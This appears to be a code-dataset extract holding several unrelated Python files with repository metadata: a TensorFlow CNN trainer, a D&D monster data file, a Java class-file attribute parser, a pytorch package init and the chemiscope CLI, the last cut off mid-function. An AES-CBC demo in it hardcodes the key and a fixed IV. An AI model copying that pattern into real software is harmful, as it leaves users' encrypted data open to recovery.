h_conv1 = tf.nn.relu(tf.nn.conv2d(x_imgs, w_1, strides=[1, 1, 1, 1], padding='SAME') + b_1)
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
w_2 = tf.Variable(tf.truncated_normal([3, 3, 64, 128], stddev=0.1), name='weights_conv2')
b_2 = tf.Variable(tf.constant(0.1, shape=[128]), name='bias_conv2')
h_conv2 = tf.nn.relu(tf.nn.conv2d(h_pool1, w_2, strides=[1, 1, 1, 1], padding='SAME') + b_2)
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
# layer_shape = h_pool2.get_shape().as_list()
# num_f = reduce(lambda a,b:a * b, layer_shape[1:])
# h_pool2_fla = tf.reshape(h_pool2, shape=[-1, num_f])
h_pool2_fla = tf.layers.flatten(h_pool2)
num_f = h_pool2_fla.get_shape().as_list()[-1]
w_fc1 = tf.Variable(tf.truncated_normal([num_f, 256], stddev=0.1), name='weights_fc1')
b_fc1 = tf.Variable(tf.constant(0.1, shape=[256]), name='bias_fc1')
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_fla, w_fc1) + b_fc1)
h_drop1 = tf.nn.dropout(h_fc1, keep_prob=keep_pro, name='Dropout')
w_fc2 = tf.Variable(tf.truncated_normal([256, 10], stddev=0.1), name='weights_fc2')
b_fc2 = tf.Variable(tf.constant(0.1, shape=[10]), name='bias_fc2')
h_fc2 = tf.matmul(h_drop1, w_fc2) + b_fc2
# tf.add_to_collection(tf.GraphKeys.WEIGHTS, w_fc1)
# regularizer = tf.contrib.layers.l2_regularizer(scale=1500./60000)
# reg_tem = tf.contrib.layers.apply_regularization(regularizer)
with tf.name_scope('loss'):
entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2))
# entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2) + reg_tem)
with tf.name_scope('accuracy'):
prediction = tf.cast(tf.equal(tf.arg_max(h_fc2, 1), tf.argmax(y, 1)), "float")
accuracy = tf.reduce_mean(prediction)
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(entropy_loss)
sess = tf.Session()
with sess.as_default():
sess.run(tf.global_variables_initializer())
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
for num in range(num_epochs):
# batch = mnist.train.next_batch(batch_size)
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
# imgs_train, labels_train = batch_imgs.reshape(-1, 784), batch_labels
imgs_data = np.c_[imgs_train, labels_train]
np.random.shuffle(imgs_data)
num_batchs = imgs_train.shape[0] // batch_size
start = time.time()
for num_ep in range(num_batchs):
# start = time.time()
imgs_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size, :-1]
labels_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size,-1]
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_batch,
y_p: labels_batch,
keep_pro: 0.5})
end = time.time()
acc *= 100
num_e = str(num + 1)
print_list = [num_e, loss, acc]
print("Epoch {0[0]}, train_loss is {0[1]:.4f}, accuracy is {0[2]:.2f}%.".format(print_list))
print("Running time is {0:.2f}s.".format(end-start))
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_test,
y_p: labels_test,
keep_pro: 1.})
acc *= 100
print_list = [loss, acc]
print("Test_loss is {0[0]:.4f}, accuracy is {0[1]:.2f}%.".format(print_list))
sess.close() | 241 | 0 | 23 |
fd159e5b7be13647139239dadc5e344afd11ffea | 1,211 | py | Python | monsters.py | ElijahZAwesome/Monster-Wiki-Bot | 7c343228090ee98347d5575ac7a253a38e4d8f98 | [
"MIT"
] | null | null | null | monsters.py | ElijahZAwesome/Monster-Wiki-Bot | 7c343228090ee98347d5575ac7a253a38e4d8f98 | [
"MIT"
] | null | null | null | monsters.py | ElijahZAwesome/Monster-Wiki-Bot | 7c343228090ee98347d5575ac7a253a38e4d8f98 | [
"MIT"
] | null | null | null | #Declaring vars goes like this:
#
#in the file, all ya gotta do is specify
#
#<monster>_<info> = "value"
#
#info can be:
#
#size
#hitpoints
#speed
#strength
#dexterity
#constitution
#intelligence
#wisdom
#charisma
#senses
#language
#challenge
#dice
#initiative
#armor
#baseattack
#attack
#fullattack
#reach
#specialattack
#specialquality
#enviroment
#
#Remember that you dont have to specify everything, like senses for example
beholder_desc = '"It floats before you, a bulbous body with a central, unblinking eye, and a large maw filled with daggerlike teeth. Smaller eyes, attached to wriggling stalks, sprout from the top of the orblike body."'
beholder_size = "Large Aberration"
beholder_dice = "11d8+44 (93 hp)"
beholder_initiative = "+6"
beholder_armor = "26 (-1 size, +2 Dex, +15 natural), touch 11, flat-footed 24"
beholder_speed = "5ft. (1 square), fly 20ft. (good)"
beholder_baseattack = "+8/+12"
beholder_attack = "Eye rays +9 ranged touch and bite +2 melee (2d4)"
beholder_fullattack = "Same as attack"
beholder_reach = "10ft./5ft."
beholder_specialattack = "Eye rays"
beholder_specialquality = "All-around vision, antimagic cone, darkvision 60 ft., and flight."
beholder_enviroment = "Cold hills" | 26.326087 | 219 | 0.753097 | #Declaring vars goes like this:
#
#in the file, all ya gotta do is specify
#
#<monster>_<info> = "value"
#
#info can be:
#
#size
#hitpoints
#speed
#strength
#dexterity
#constitution
#intelligence
#wisdom
#charisma
#senses
#language
#challenge
#dice
#initiative
#armor
#baseattack
#attack
#fullattack
#reach
#specialattack
#specialquality
#enviroment
#
#Remember that you dont have to specify everything, like senses for example
beholder_desc = '"It floats before you, a bulbous body with a central, unblinking eye, and a large maw filled with daggerlike teeth. Smaller eyes, attached to wriggling stalks, sprout from the top of the orblike body."'
beholder_size = "Large Aberration"
beholder_dice = "11d8+44 (93 hp)"
beholder_initiative = "+6"
beholder_armor = "26 (-1 size, +2 Dex, +15 natural), touch 11, flat-footed 24"
beholder_speed = "5ft. (1 square), fly 20ft. (good)"
beholder_baseattack = "+8/+12"
beholder_attack = "Eye rays +9 ranged touch and bite +2 melee (2d4)"
beholder_fullattack = "Same as attack"
beholder_reach = "10ft./5ft."
beholder_specialattack = "Eye rays"
beholder_specialquality = "All-around vision, antimagic cone, darkvision 60 ft., and flight."
beholder_enviroment = "Cold hills" | 0 | 0 | 0 |
69fcdb91611709f74926d6ab00afefc9cdb17c0d | 11,536 | py | Python | src/python/twitter/common/java/attribute_info.py | zhouyijiaren/commons | 10df6fb63547baa9047782aa7ad4edf354914b10 | [
"Apache-2.0"
] | 1,143 | 2015-01-05T04:19:24.000Z | 2019-12-11T12:02:23.000Z | src/python/twitter/common/java/attribute_info.py | zhouyijiaren/commons | 10df6fb63547baa9047782aa7ad4edf354914b10 | [
"Apache-2.0"
] | 144 | 2015-01-06T05:05:07.000Z | 2019-12-12T18:02:37.000Z | src/python/twitter/common/java/attribute_info.py | zhouyijiaren/commons | 10df6fb63547baa9047782aa7ad4edf354914b10 | [
"Apache-2.0"
] | 426 | 2015-01-08T08:33:41.000Z | 2019-12-09T13:15:40.000Z | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import sys
from .java_types import *
from .class_flags import ClassFlags
from . import signature_parser
class AttributeInfo(object):
"""
Encapsulate the attribute_info class.
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#43817
attribute_info {
u2 attribute_name_index;
u4 attribute_length;
u1 info[attribute_length];
}
"""
def size(self):
"""Total size of the attribute_info blob."""
return self._size
def bytes(self):
"""Attribute-specific data for subclasses."""
return self._info_data
class Code(AttributeInfo):
"""
Code_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 max_stack;
u2 max_locals;
u4 code_length;
u1 code[code_length];
u2 exception_table_length;
{
u2 start_pc;
u2 end_pc;
u2 handler_pc;
u2 catch_type;
} exception_table[exception_table_length];
u2 attributes_count;
attribute_info attributes[attributes_count];
}
"""
@staticmethod
class SourceFile(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79868
SourceFile_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 sourcefile_index;
}
"""
@staticmethod
class Exceptions(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#3129
Exceptions_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 number_of_exceptions;
u2 exception_index_table[number_of_exceptions];
}
"""
@staticmethod
class Signature(AttributeInfo):
"""
Signature_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 signature_index
}
"""
@staticmethod
class InnerClassFlags(object):
"""http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#75734
"""
ACC_PUBLIC = 0x0001
ACC_PRIVATE = 0x0002
ACC_PROTECTED = 0x0004
ACC_STATIC = 0x0008
ACC_FINAL = 0x0010
ACC_INTERFACE = 0x0200
ACC_ABSTRACT = 0x0400
ACC_SYNTHETIC = 0x1000
ACC_ANNOTATION = 0x2000
ACC_ENUM = 0x4000
MASK = ACC_PUBLIC | ACC_PRIVATE | ACC_PROTECTED | \
ACC_STATIC | ACC_FINAL | ACC_INTERFACE | \
ACC_ABSTRACT | ACC_SYNTHETIC | ACC_ANNOTATION | \
ACC_ENUM
class InnerClasses(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79996
InnerClasses_attribute {
u2 attribute_name_index;
u4 attribute_length;
------
u2 number_of_classes;
{ u2 inner_class_info_index;
u2 outer_class_info_index;
u2 inner_name_index;
u2 inner_class_access_flags;
} classes[number_of_classes];
}
"""
@staticmethod
class Attribute(object):
"""
Factory for producing AttributeInfos.
"""
_KNOWN_ATTRIBUTE_MAP = {
SourceFile.name(): SourceFile,
Signature.name(): Signature,
Exceptions.name(): Exceptions,
Code.name(): Code
# InnerClasses.name(): InnerClasses
}
@staticmethod
def parse(data, constants):
"""Parse the Attribute_info
@data: The data stream from which to deserialize the blob
@constants: The constant pool of the class file.
"""
attribute_name_index = u2(data[0:2]).get()
attribute_name = constants[attribute_name_index]
attribute_class = Attribute._KNOWN_ATTRIBUTE_MAP.get(attribute_name.bytes(), None)
if attribute_class is not None:
return attribute_class(data, constants)
else:
return AttributeInfo(data, constants)
| 30.357895 | 100 | 0.663835 | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import sys
from .java_types import *
from .class_flags import ClassFlags
from . import signature_parser
class AttributeInfo(object):
"""
Encapsulate the attribute_info class.
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#43817
attribute_info {
u2 attribute_name_index;
u4 attribute_length;
u1 info[attribute_length];
}
"""
def __init__(self, data, constants):
self._parse_header(data, constants)
def _parse_header(self, data, constants):
self._attribute_name_index = u2(data[0:2]).get()
self._attribute_name = constants[self._attribute_name_index]
self._attribute_length = u4(data[2:6]).get()
self._size = 6 + self._attribute_length
self._info_data = data[6:self._size]
def name(self):
return self._attribute_name
def size(self):
"""Total size of the attribute_info blob."""
return self._size
def parsed_name(self):
return self._attribute_name
def bytes(self):
"""Attribute-specific data for subclasses."""
return self._info_data
def __str__(self):
return 'AttributeInfo(name:%s, size=%d)' % (self._attribute_name, self.size())
class Code(AttributeInfo):
"""
Code_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 max_stack;
u2 max_locals;
u4 code_length;
u1 code[code_length];
u2 exception_table_length;
{
u2 start_pc;
u2 end_pc;
u2 handler_pc;
u2 catch_type;
} exception_table[exception_table_length];
u2 attributes_count;
attribute_info attributes[attributes_count];
}
"""
@staticmethod
def name():
return 'Code'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
(max_stack, max_locals, code_length), bytes = JavaNativeType.parse(bytes, u2, u2, u4)
self._code_length = code_length
bytecode = bytes[0:code_length]
bytes = bytes[code_length:]
(exception_table_length,), bytes = JavaNativeType.parse(bytes, u2)
# gobble up stuff
for k in range(exception_table_length):
_, bytes = JavaNativeType.parse(bytes, u2, u2, u2, u2)
(attributes_count,), bytes = JavaNativeType.parse(bytes, u2)
attributes = []
offset = 0
for k in range(attributes_count):
attribute = Attribute.parse(bytes[offset:], constants)
offset += attribute.size()
attributes.append(attribute)
self._attributes = attributes
def __str__(self):
output = 'Code(length:%s)' % self._code_length
if self._attributes:
output += '\n'
attrs = []
for attr in self._attributes:
attrs.append(' %s: %s' % (attr.name(), attr))
output += '\n'.join(attrs)
return output
class SourceFile(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79868
SourceFile_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 sourcefile_index;
}
"""
@staticmethod
def name():
return 'SourceFile'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
self._sourcefile_index = u2(bytes[0:2]).get()
self._sourcefile = constants[self._sourcefile_index]
def __str__(self):
return 'SourceFile(file:%s)' % self._sourcefile
class Exceptions(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#3129
Exceptions_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 number_of_exceptions;
u2 exception_index_table[number_of_exceptions];
}
"""
@staticmethod
def name():
return 'Exceptions'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
self._number_of_exceptions = u2(bytes[0:2]).get()
self._exceptions = []
for index in range(self._number_of_exceptions):
constant_index = u2(bytes[2*(index+1):]).get()
self._exceptions.append(constants[constant_index](constants))
def __str__(self):
if self._exceptions:
return 'throws %s' % ' '.join('%s' % s for s in self._exceptions)
else:
return ''
class Signature(AttributeInfo):
"""
Signature_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 signature_index
}
"""
@staticmethod
def name():
return 'Signature'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
self._signature_index = u2(bytes[0:2]).get()
self._signature = constants[self._signature_index]
self._parsed = None
self._parse_signature()
def _parse_signature(self):
class_signature, _ = signature_parser.ClassSignature.match(self._signature.bytes())
if class_signature:
self._parsed = class_signature
return
method_signature, _ = signature_parser.MethodTypeSignature.match(self._signature.bytes())
if method_signature:
self._parsed = method_signature
def __str__(self):
return 'Signature(%s)' % (
self._parsed)
class InnerClassFlags(object):
"""http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#75734
"""
ACC_PUBLIC = 0x0001
ACC_PRIVATE = 0x0002
ACC_PROTECTED = 0x0004
ACC_STATIC = 0x0008
ACC_FINAL = 0x0010
ACC_INTERFACE = 0x0200
ACC_ABSTRACT = 0x0400
ACC_SYNTHETIC = 0x1000
ACC_ANNOTATION = 0x2000
ACC_ENUM = 0x4000
MASK = ACC_PUBLIC | ACC_PRIVATE | ACC_PROTECTED | \
ACC_STATIC | ACC_FINAL | ACC_INTERFACE | \
ACC_ABSTRACT | ACC_SYNTHETIC | ACC_ANNOTATION | \
ACC_ENUM
def __init__(self, flags):
self._flags = flags
if flags ^ (flags & InnerClassFlags.MASK) != 0:
print >> sys.stderr, "Invalid InnerClassFlags mask!! Extra bits: %s" % (
flags ^ (flags & InnerClassFlags.MASK))
def public(self):
return self._flags & InnerClassFlags.ACC_PUBLIC
def private(self):
return self._flags & InnerClassFlags.ACC_PRIVATE
def protected(self):
return self._flags & InnerClassFlags.ACC_PROTECTED
def static(self):
return self._flags & InnerClassFlags.ACC_STATIC
def final(self):
return self._flags & InnerClassFlags.ACC_FINAL
def interface(self):
return self._flags & InnerClassFlags.ACC_INTERFACE
def abstract(self):
return self._flags & InnerClassFlags.ACC_ABSTRACT
def synthetic(self):
return self._flags & InnerClassFlags.ACC_SYNTHETIC
def annotation(self):
return self._flags & InnerClassFlags.ACC_ANNOTATION
def enum(self):
return self._flags & InnerClassFlags.ACC_ENUM
def __str__(self):
verbs = []
if self.public(): verbs.append('public')
if self.private(): verbs.append('private')
if self.protected(): verbs.append('protected')
if self.static(): verbs.append('static')
if self.final(): verbs.append('final')
if self.interface(): verbs.append('interface')
if self.abstract(): verbs.append('abstract')
if self.synthetic(): verbs.append('synthetic')
if self.annotation(): verbs.append('annotation')
if self.enum(): verbs.append('enum')
return ' '.join(verbs)
class InnerClass(object):
def __init__(self, data, constants):
(inner_class_info_index, outer_class_info_index,
inner_name_index, inner_class_flags), data = JavaNativeType.parse(data, u2, u2, u2, u2)
debug = """
print 'constant pool size, inner, outer, name, flags = %s, %s, %s, %s, %s => %s' % (
len(constants),
inner_class_info_index,
outer_class_info_index,
inner_name_index,
inner_class_flags,
InnerClassFlags(inner_class_flags))
"""
self._inner_class = constants[inner_class_info_index]
if outer_class_info_index < len(constants):
self._outer_class = constants[outer_class_info_index]
else:
print >> sys.stderr, 'WARNING: Malformed InnerClass(outer_class_info_index)!'
self._outer_class = None
if inner_name_index < len(constants):
self._inner_name = constants[inner_name_index]
else:
print >> sys.stderr, 'WARNING: Malformed InnerClass(inner_name)!'
self._inner_name = None
self._inner_class_access_flags = InnerClassFlags(inner_class_flags)
if self._inner_class is not None:
self._inner_class = self._inner_class(constants)
if self._outer_class is not None:
self._outer_class = self._outer_class(constants)
if self._inner_name is not None:
self._inner_name = self._inner_name(constants)
else:
self._inner_name = 'Anonymous'
def __str__(self):
return '%s %s::%s %s' % (
self._inner_class_access_flags,
self._outer_class,
self._inner_class,
self._inner_name)
class InnerClasses(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79996
InnerClasses_attribute {
u2 attribute_name_index;
u4 attribute_length;
------
u2 number_of_classes;
{ u2 inner_class_info_index;
u2 outer_class_info_index;
u2 inner_name_index;
u2 inner_class_access_flags;
} classes[number_of_classes];
}
"""
@staticmethod
def name():
return 'InnerClasses'
def __init__(self, data, constants):
AttributeInfo.__init__(self, data, constants)
bytes = self.bytes()
self._number_of_classes = u2(bytes[0:2]).get()
self._classes = []
offset = 2
for index in range(self._number_of_classes):
klass = InnerClass(data[offset:], constants)
self._classes.append(klass)
offset += 4 * u2.size()
def __str__(self):
return '{\n%s\n}' % ('\n '.join('%s' % s for s in self._classes))
class Attribute(object):
"""
Factory for producing AttributeInfos.
"""
_KNOWN_ATTRIBUTE_MAP = {
SourceFile.name(): SourceFile,
Signature.name(): Signature,
Exceptions.name(): Exceptions,
Code.name(): Code
# InnerClasses.name(): InnerClasses
}
@staticmethod
def parse(data, constants):
"""Parse the Attribute_info
@data: The data stream from which to deserialize the blob
@constants: The constant pool of the class file.
"""
attribute_name_index = u2(data[0:2]).get()
attribute_name = constants[attribute_name_index]
attribute_class = Attribute._KNOWN_ATTRIBUTE_MAP.get(attribute_name.bytes(), None)
if attribute_class is not None:
return attribute_class(data, constants)
else:
return AttributeInfo(data, constants)
| 6,082 | 4 | 891 |
30077f1fb1c77491461f07166fae7c2a55b94011 | 196 | py | Python | tests/assets/__init__.py | giorgiosironi/jats-ingester | 3873e8141f34ebe6237de746ac5e84f131f15800 | [
"MIT"
] | null | null | null | tests/assets/__init__.py | giorgiosironi/jats-ingester | 3873e8141f34ebe6237de746ac5e84f131f15800 | [
"MIT"
] | null | null | null | tests/assets/__init__.py | giorgiosironi/jats-ingester | 3873e8141f34ebe6237de746ac5e84f131f15800 | [
"MIT"
] | null | null | null | from pathlib import Path
| 19.6 | 51 | 0.622449 | from pathlib import Path
def get_asset(name):
try:
path = next(Path('.').glob('**/%s' % name))
except StopIteration:
raise FileNotFoundError
return path.read_bytes()
| 147 | 0 | 23 |
55431168e1c8c9a42b9829883906423b49c14f48 | 486 | py | Python | pyaes.py | shanyuanqiao/crypto-pkcs7-example | 4940144deb63d4ab52df20e69119610a94254893 | [
"blessing"
] | 28 | 2015-03-11T05:24:08.000Z | 2022-01-21T21:26:03.000Z | pyaes.py | shanyuanqiao/crypto-pkcs7-example | 4940144deb63d4ab52df20e69119610a94254893 | [
"blessing"
] | 1 | 2016-01-31T23:22:18.000Z | 2016-01-31T23:22:18.000Z | pyaes.py | shanyuanqiao/crypto-pkcs7-example | 4940144deb63d4ab52df20e69119610a94254893 | [
"blessing"
] | 17 | 2015-03-27T08:30:33.000Z | 2019-07-13T08:30:10.000Z | from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import base64
key = 'your key 16bytes'
# 16 byte initialization vector
iv = '1234567812345678'
aes = AES.new(key, AES.MODE_CBC, iv)
encoder = PKCS7Encoder()
text = 'This is my plain text'
# pad the plain text according to PKCS7
pad_text = encoder.encode(text)
# encrypt the padding text
cipher = aes.encrypt(pad_text)
# base64 encode the cipher text for transport
enc_cipher = base64.b64encode(cipher)
print enc_cipher
| 21.130435 | 45 | 0.769547 | from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import base64
key = 'your key 16bytes'
# 16 byte initialization vector
iv = '1234567812345678'
aes = AES.new(key, AES.MODE_CBC, iv)
encoder = PKCS7Encoder()
text = 'This is my plain text'
# pad the plain text according to PKCS7
pad_text = encoder.encode(text)
# encrypt the padding text
cipher = aes.encrypt(pad_text)
# base64 encode the cipher text for transport
enc_cipher = base64.b64encode(cipher)
print enc_cipher
| 0 | 0 | 0 |
c55c8fe7e817243e22b1a5e3ece75a4d62cad57e | 1,554 | py | Python | neuralnet_pytorch/__init__.py | justanhduc/neuralnet-pytorch | cbb0c5a540a0ba91cb4dd20684bb00692305d193 | [
"MIT"
] | 28 | 2019-01-07T04:07:55.000Z | 2021-11-09T15:16:11.000Z | neuralnet_pytorch/__init__.py | justanhduc/neuralnet-pytorch | cbb0c5a540a0ba91cb4dd20684bb00692305d193 | [
"MIT"
] | 9 | 2019-12-25T08:00:33.000Z | 2021-11-23T09:02:34.000Z | neuralnet_pytorch/__init__.py | justanhduc/neuralnet-pytorch | cbb0c5a540a0ba91cb4dd20684bb00692305d193 | [
"MIT"
] | 3 | 2020-08-07T12:49:05.000Z | 2022-03-07T21:32:39.000Z | from __future__ import print_function
minimum_required = '1.0.0'
# Ensure Pytorch is importable and its version is sufficiently recent. This
# needs to happen before anything else, since the imports below will try to
# import Pytorch, too.
def _ensure_pt_install(): # pylint: disable=g-statement-before-imports
"""Attempt to import Pytorch, and ensure its version is sufficient.
Raises:
ImportError: if either Pytorch is not importable or its version is
inadequate.
"""
try:
import torch
except ImportError:
# Print more informative error message, then reraise.
print('\n\nFailed to import Pytorch. '
'To use neuralnet-pytorch, please install '
'Pytorch (> %s) by following instructions at '
'https://pytorch.org/get-started/locally/.\n\n' % minimum_required)
raise
del torch
_ensure_pt_install()
# Cleanup symbols to avoid polluting namespace.
del minimum_required
import sys as _sys
for symbol in ['_ensure_pt_install', '_sys']:
delattr(_sys.modules[__name__], symbol)
try:
import neuralnet_pytorch.ext as ext
cuda_ext_available = True
del ext
except ModuleNotFoundError:
cuda_ext_available = False
from . import utils
from .utils import DataLoader, DataPrefetcher, cuda_available, function
from .layers import *
from .metrics import *
from .monitor import *
from . import optim
from .version import author as __author__
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 27.75 | 81 | 0.721364 | from __future__ import print_function
minimum_required = '1.0.0'
# Ensure Pytorch is importable and its version is sufficiently recent. This
# needs to happen before anything else, since the imports below will try to
# import Pytorch, too.
def _ensure_pt_install(): # pylint: disable=g-statement-before-imports
"""Attempt to import Pytorch, and ensure its version is sufficient.
Raises:
ImportError: if either Pytorch is not importable or its version is
inadequate.
"""
try:
import torch
except ImportError:
# Print more informative error message, then reraise.
print('\n\nFailed to import Pytorch. '
'To use neuralnet-pytorch, please install '
'Pytorch (> %s) by following instructions at '
'https://pytorch.org/get-started/locally/.\n\n' % minimum_required)
raise
del torch
_ensure_pt_install()
# Cleanup symbols to avoid polluting namespace.
del minimum_required
import sys as _sys
for symbol in ['_ensure_pt_install', '_sys']:
delattr(_sys.modules[__name__], symbol)
try:
import neuralnet_pytorch.ext as ext
cuda_ext_available = True
del ext
except ModuleNotFoundError:
cuda_ext_available = False
from . import utils
from .utils import DataLoader, DataPrefetcher, cuda_available, function
from .layers import *
from .metrics import *
from .monitor import *
from . import optim
from .version import author as __author__
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 0 | 0 | 0 |
4a38c0dcd17b7655c6608474cd12a6bc89ea440d | 3,482 | py | Python | python/chemiscope/main.py | Luthaf/chemiscope | 4d40f587c05b7fdd546444134ab15bd80ad237ff | [
"BSD-3-Clause"
] | null | null | null | python/chemiscope/main.py | Luthaf/chemiscope | 4d40f587c05b7fdd546444134ab15bd80ad237ff | [
"BSD-3-Clause"
] | null | null | null | python/chemiscope/main.py | Luthaf/chemiscope | 4d40f587c05b7fdd546444134ab15bd80ad237ff | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .input import write_input
def main():
"""
Command-line utility to generate an input for chemiscope — the interactive
structure-property explorer. Parses an input file containing atomic
structures using the ASE I/O module, and converts it into a JSON file that
can be loaded in chemiscope. Frame and environment properties must be
written in the same file containing atomic structures: we recommend the
extended xyz format, which is flexible and simple. In all cases, this
utility will simply write to the JSON file anything that is readable by
ASE.
"""
import argparse
try:
# command-line execution. requires ASE IO module
import ase.io as ase_io
except ImportError:
raise ImportError(
"chemiscope_input needs ASE modules to parse structure inputs"
)
# Tweak the autogenerated help output to look nicer
parser = argparse.ArgumentParser(
description=main.__doc__, formatter_class=formatter
)
parser.add_argument(
"input", type=str, help="input file containing the structures and properties"
)
parser.add_argument(
"-o", "--output", type=str, help="chemiscope output file in JSON format"
)
parser.add_argument(
"-c",
"--cutoff",
type=float,
help="generate atom-centred environments with the given cutoff",
)
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--only-atoms",
action="store_true",
help="only use per-atom properties from the input file",
)
group.add_argument(
"--only-structures",
action="store_true",
help="only use per-structure properties from the input file",
)
parser.add_argument("--name", default="", type=str, help="name of the dataset")
parser.add_argument(
"--description", default="", type=str, help="description of the dataset"
)
parser.add_argument(
"--authors", nargs="*", type=str, default=[], help="list of dataset authors"
)
parser.add_argument(
"--references",
nargs="*",
type=str,
default=[],
help="list of references for the dataset",
)
args = parser.parse_args()
if args.only_atoms and args.cutoff is None:
raise Exception("--only-atoms requires to give --cutoff")
if args.only_structures and args.cutoff is not None:
raise Exception("--only-structure can not be given with --cutoff")
# read file with ASE and remove extraneous properties
frames = ase_io.read(args.input, ":")
if args.only_structures:
for frame in frames:
for key in list(frame.arrays.keys()):
if key not in ["positions", "numbers"]:
del frame.arrays[key]
elif args.only_atoms:
for frame in frames:
frame.info = {}
# determine output file name automatically if missing
output = args.output or args.input + "_chemiscope.json.gz"
write_input(
path=output,
frames=frames,
meta={
"name": args.name,
"description": args.description,
"authors": args.authors,
"references": args.references,
},
cutoff=args.cutoff,
)
if __name__ == "__main__":
main()
| 32.240741 | 85 | 0.631534 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .input import write_input
def main():
"""
Command-line utility to generate an input for chemiscope — the interactive
structure-property explorer. Parses an input file containing atomic
structures using the ASE I/O module, and converts it into a JSON file that
can be loaded in chemiscope. Frame and environment properties must be
written in the same file containing atomic structures: we recommend the
extended xyz format, which is flexible and simple. In all cases, this
utility will simply write to the JSON file anything that is readable by
ASE.
"""
import argparse
try:
# command-line execution. requires ASE IO module
import ase.io as ase_io
except ImportError:
raise ImportError(
"chemiscope_input needs ASE modules to parse structure inputs"
)
# Tweak the autogenerated help output to look nicer
def formatter(prog):
return argparse.HelpFormatter(prog, max_help_position=22)
parser = argparse.ArgumentParser(
description=main.__doc__, formatter_class=formatter
)
parser.add_argument(
"input", type=str, help="input file containing the structures and properties"
)
parser.add_argument(
"-o", "--output", type=str, help="chemiscope output file in JSON format"
)
parser.add_argument(
"-c",
"--cutoff",
type=float,
help="generate atom-centred environments with the given cutoff",
)
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--only-atoms",
action="store_true",
help="only use per-atom properties from the input file",
)
group.add_argument(
"--only-structures",
action="store_true",
help="only use per-structure properties from the input file",
)
parser.add_argument("--name", default="", type=str, help="name of the dataset")
parser.add_argument(
"--description", default="", type=str, help="description of the dataset"
)
parser.add_argument(
"--authors", nargs="*", type=str, default=[], help="list of dataset authors"
)
parser.add_argument(
"--references",
nargs="*",
type=str,
default=[],
help="list of references for the dataset",
)
args = parser.parse_args()
if args.only_atoms and args.cutoff is None:
raise Exception("--only-atoms requires to give --cutoff")
if args.only_structures and args.cutoff is not None:
raise Exception("--only-structure can not be given with --cutoff")
# read file with ASE and remove extraneous properties
frames = ase_io.read(args.input, ":")
if args.only_structures:
for frame in frames:
for key in list(frame.arrays.keys()):
if key not in ["positions", "numbers"]:
del frame.arrays[key]
elif args.only_atoms:
for frame in frames:
frame.info = {}
# determine output file name automatically if missing
output = args.output or args.input + "_chemiscope.json.gz"
